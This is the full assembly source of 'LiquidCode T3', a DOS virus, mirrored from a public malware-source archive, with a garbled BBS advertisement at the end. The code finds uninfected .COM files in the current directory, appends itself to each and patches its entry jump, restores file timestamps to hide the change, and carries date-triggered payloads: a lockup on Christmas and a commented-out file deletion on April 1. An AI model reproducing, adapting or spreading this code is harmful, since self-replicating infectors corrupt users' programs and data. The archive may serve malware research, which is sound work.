mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
4b9382ddbc
push
362 lines
5.2 KiB
NASM
362 lines
5.2 KiB
NASM
;LiquidCode --- T3
|
||
;
|
||
; Virus
|
||
;This version:
|
||
;Searches current directory for non-infected com files, if any found
|
||
;it will become infected!
|
||
;This virus has a routine which self-destructs itself and uninfects
|
||
;the file.
|
||
assume cs:code
|
||
.286
|
||
code segment "code"
|
||
org 0100h
|
||
start proc
|
||
jmp v_start ;first 5 bytes |
|
||
nop ; |
|
||
nop ; |
|
||
v_start:
|
||
call $+3 ;Actual virus
|
||
pop dx
|
||
sub dx, 3
|
||
push dx ;save relocation factor in BP
|
||
pop bp ;so virus can be copied anywhere twoards
|
||
mov si, dx ;the end of the file
|
||
;
|
||
; Replace first 5 bytes in memory with original
|
||
; program code so normal program can run later
|
||
add si, first_five
|
||
mov di, 0100h
|
||
mov cx, 5
|
||
lodsb
|
||
stosb
|
||
loop $-2
|
||
;see if user want to disinfect this file
|
||
; mov si, 82h
|
||
; lodsb
|
||
; cmp al, "[" ;is al the code to disinfect? "["
|
||
; jne ok_dont_disinfect
|
||
; jmp self_kill
|
||
ok_dont_disinfect:
|
||
;here should be date checks to see
|
||
;if an evil function should be unleashed!!
|
||
mov ah, 2ah
|
||
int 21h
|
||
;cx year 1980-2099
|
||
;dh month 1-12
|
||
;dl day
|
||
;al day of week 0=sun 1=mon -> 7=sat
|
||
cmp dh, 12
|
||
jne notdec
|
||
cmp dl, 25
|
||
jne notdec
|
||
jmp christmas
|
||
notdec:
|
||
cmp dh, 4
|
||
jne notapril
|
||
cmp dl, 1
|
||
jne notapril
|
||
; jmp aprilfools
|
||
notapril:
|
||
|
||
;Set the DTA
|
||
call set_dta
|
||
;find first file to ?infect?
|
||
call find_first_file
|
||
go_again:
|
||
mov si, bp
|
||
add si, size_
|
||
lodsw
|
||
cmp ax, 5
|
||
ja gd4
|
||
jmp resrch
|
||
gd4:
|
||
call open_file
|
||
mov bx, ax
|
||
mov al, 0
|
||
call date_time
|
||
mov ah, 3fh
|
||
mov cx, 5
|
||
mov dx, bp
|
||
add dx, first_five
|
||
int 21h
|
||
;**** mov ax, 4202h
|
||
mov cx, 0
|
||
mov ax, 4202h
|
||
mov dx, cx
|
||
int 21h
|
||
sub ax, 3
|
||
mov si, bp
|
||
add si, new_5
|
||
mov [si+1], ax
|
||
mov si, bp
|
||
mov di, si
|
||
add si, chkmark
|
||
add di, mark
|
||
mov cx, 2
|
||
repe cmpsb
|
||
jne INFECT
|
||
;File found was previously infected!
|
||
; search for new one now.
|
||
jmp resrch
|
||
|
||
wipe_name:
|
||
push di
|
||
push ax
|
||
push cx
|
||
mov di, bp
|
||
add di, name_
|
||
mov cx, 13
|
||
mov al, 0
|
||
rep stosb
|
||
pop cx
|
||
pop ax
|
||
pop di
|
||
ret
|
||
resrch:
|
||
call wipe_name
|
||
mov ah, 4fh
|
||
int 21h
|
||
jnc gd3
|
||
jmp term_virus
|
||
gd3:
|
||
jmp go_again
|
||
INFECT:
|
||
;Time to infect the file!!
|
||
mov si, bp
|
||
add si, handle
|
||
mov bx, [si]
|
||
mov cx, vsize
|
||
mov dx, bp
|
||
call wipe_name
|
||
mov ax, 4000h
|
||
int 21h
|
||
mov ax, 4200h
|
||
mov cx, 0
|
||
mov dx, cx
|
||
int 21h
|
||
mov dx, bp
|
||
add dx, new_5
|
||
mov ax, 4000h
|
||
mov cx, 5
|
||
int 21h
|
||
mov al, 1
|
||
call date_time
|
||
mov ax, 3e00h
|
||
int 21h
|
||
jmp resrch
|
||
|
||
fndnam proc
|
||
mov si, env
|
||
mov ax, [si]
|
||
mov es, ax
|
||
mov ds, ax
|
||
mov si, 0
|
||
mov di, si
|
||
__lp:
|
||
lodsb
|
||
cmp al, 0
|
||
je chknxt
|
||
stosb
|
||
jmp __lp
|
||
chknxt:
|
||
stosb
|
||
lodsb
|
||
cmp al, 0
|
||
je fnd1
|
||
stosb
|
||
jmp __lp
|
||
fnd1:
|
||
stosb
|
||
__lp2:
|
||
lodsb
|
||
cmp al, "a"
|
||
jae ff_
|
||
up2:
|
||
cmp al, "A"
|
||
jae fff_
|
||
up3:
|
||
stosb
|
||
jmp __lp2
|
||
ff_:
|
||
cmp al,"z"
|
||
jbe fnd
|
||
jmp up2
|
||
fff_:
|
||
cmp al, "Z"
|
||
jbe fnd
|
||
jmp up3
|
||
fnd:
|
||
mov si, di
|
||
mov al, 0
|
||
repne scasb
|
||
mov dx, si
|
||
mov di, dx
|
||
ret
|
||
env equ 2ch
|
||
fndnam endp
|
||
|
||
|
||
self_kill:
|
||
;this procedure disinfects specified files
|
||
;SI points to the name of current file on disk
|
||
;which is infected
|
||
call fndnam ;find name of current file from env block in memory
|
||
jmp gd__
|
||
abrt:
|
||
int 20h
|
||
gd__:
|
||
mov ax, 3d02h
|
||
int 21h
|
||
jc abrt
|
||
mov bx, ax
|
||
mov ax, cs
|
||
mov ds, ax
|
||
mov es, ax
|
||
mov cx, 5
|
||
mov dx, bp
|
||
add dx, first_five
|
||
call wipe_name
|
||
mov ax, 4000h
|
||
int 21h
|
||
jc abrt
|
||
mov dx, 0
|
||
mov cx, 0
|
||
mov ax, 4202h
|
||
int 21h
|
||
jnc gd__1
|
||
jmp abrt
|
||
gd__1:
|
||
sub ax, vsize
|
||
mov dx, ax
|
||
mov cx, 0
|
||
mov ax, 4200h
|
||
int 21h
|
||
call wipe_name
|
||
mov cx, 0
|
||
mov ax, 4000h
|
||
int 21h
|
||
mov ax, 3e00h
|
||
int 21h
|
||
jmp term_virus
|
||
date_time:
|
||
pusha
|
||
mov ah, 57h
|
||
cmp al, 0
|
||
je fnd__$
|
||
mov di, bp
|
||
mov si, di
|
||
add di, date
|
||
add si, time
|
||
mov dx, [di]
|
||
mov cx, [si]
|
||
int 21h
|
||
jmp ret__
|
||
fnd__$:
|
||
int 21h
|
||
mov si, bp
|
||
mov di, bp
|
||
add si, time
|
||
add di, date
|
||
mov [si], cx
|
||
mov [di], dx
|
||
ret__:
|
||
popa
|
||
ret
|
||
open_file:
|
||
mov dx, bp
|
||
add dx, name_
|
||
mov ax, 3d02h
|
||
int 21h
|
||
jnc gd2
|
||
jmp term_virus
|
||
gd2:
|
||
mov si, bp
|
||
add si, handle
|
||
mov [si], ax
|
||
ret
|
||
find_first_file:
|
||
mov dx, bp
|
||
mov cx, 0
|
||
mov ah, 4eh
|
||
add dx, all_com_files
|
||
int 21h
|
||
jnc gd1
|
||
jmp term_virus
|
||
gd1:
|
||
ret
|
||
set_dta:
|
||
mov dx, bp
|
||
mov ah, 1ah
|
||
add dx, dta
|
||
int 21h
|
||
ret
|
||
term_virus:
|
||
mov ax, 0
|
||
mov bx, ax
|
||
mov cx, bx
|
||
mov dx, cx
|
||
mov si, 0100h
|
||
mov di, -1
|
||
mov bp, di
|
||
push 0100h
|
||
ret
|
||
|
||
CHRISTMAS:
|
||
;Program Lockup
|
||
; Exit without running program
|
||
int 20h
|
||
;APRILFOOLS:
|
||
;Ha Ha delete current file
|
||
; call fndnam
|
||
; mov ah, 41h
|
||
; int 21h
|
||
; mov ax, cs
|
||
; mov ds, ax
|
||
; mov es, ax
|
||
; jmp term_virus
|
||
; Data Bank
|
||
_fstfive:
|
||
int 20h
|
||
nop
|
||
ckmrk:
|
||
nop
|
||
nop
|
||
acf db "*.COM",0
|
||
dt_ dw 0
|
||
tme dw 0
|
||
d_t_a:
|
||
rfd db 21 dup (0)
|
||
att db 0
|
||
dw 0
|
||
dw 0
|
||
sz dd 0
|
||
n_me db 13 dup (0),0
|
||
handl dw 0
|
||
nw_5 db 0e9h,0,0
|
||
mrk db "<T3> "
|
||
strain db "<tm>LiquidCode 92"
|
||
;
|
||
end___:
|
||
first_five = offset _fstfive-0105h
|
||
all_com_files = offset acf-0105h
|
||
dta = offset d_t_a-0105h
|
||
attribute = offset att-0105h
|
||
time = offset tme-0105h
|
||
date = offset dt_-0105h
|
||
size_ = offset sz-0105h
|
||
name_ = offset n_me-0105h
|
||
handle = offset handl-0105h
|
||
new_5 = offset nw_5-0105h
|
||
mark = offset mrk-0105h
|
||
chkmark = offset ckmrk-0105h
|
||
vsize = offset end___-0105h
|
||
start endp
|
||
code ends
|
||
end start
|
||
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|